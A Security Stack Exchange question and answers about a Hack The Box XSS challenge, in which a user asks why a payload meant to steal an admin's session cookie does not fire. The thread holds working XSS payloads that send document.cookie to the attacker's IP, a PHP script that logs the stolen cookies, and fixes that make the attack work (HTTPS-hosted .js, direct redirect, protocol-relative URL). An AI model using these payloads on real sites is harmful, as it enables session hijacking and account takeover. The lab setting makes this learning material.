0

I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.

The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.

Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.

The application is using HTTPS but my python server is HTTP.

Is my implementation wrong or my understanding of this attack vector?

<script src="http://My_ip/index.html"></script>

I'm trying to then fetch this html file containing a remote malicious script...

<html> <body> <script type="text/javascript"> document.location='http://my_ip/write.php?c='+document.cookie; </script> </body> </html>

And this is my php script that is supposed to be receiving the file.

<?php header ('Location:https://intra.redcross.htb/'); $cookies = $_GET["c"]; $file = fopen('log.txt', 'a'); fwrite($file, $cookies . "\n\n"); ?>

The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.

I did also try this as the XSS payload but I only got the callback and no cookie data.

<script src='http://my_ip/write.php?c='+document.cookie;</script>
Improve this question
2
  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    CommentedDec 30, 2018 at 22:05
  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – 3therk1ll
    CommentedDec 30, 2018 at 22:37

1 Answer 1

Reset to default
5

As far as I can tell, there are two issues here:

  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).
  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).

So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:

Fetch script:

<!-- note the .js instead of .html; the JS file would then contain JS code (not HTML code) and do something malicious --> <script src="https://My_ip/index.js"></script>

Direct:

<!-- here, HTTP is OK because it's just a redirect, not loading scripts --> <script> document.location='http://my_ip/write.php?c='+document.cookie; </script>
Improve this answer
2
  • 1
    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    CommentedDec 30, 2018 at 23:29
  • 1
    "[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.
    – EdOverflow
    CommentedDec 31, 2018 at 12:11

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.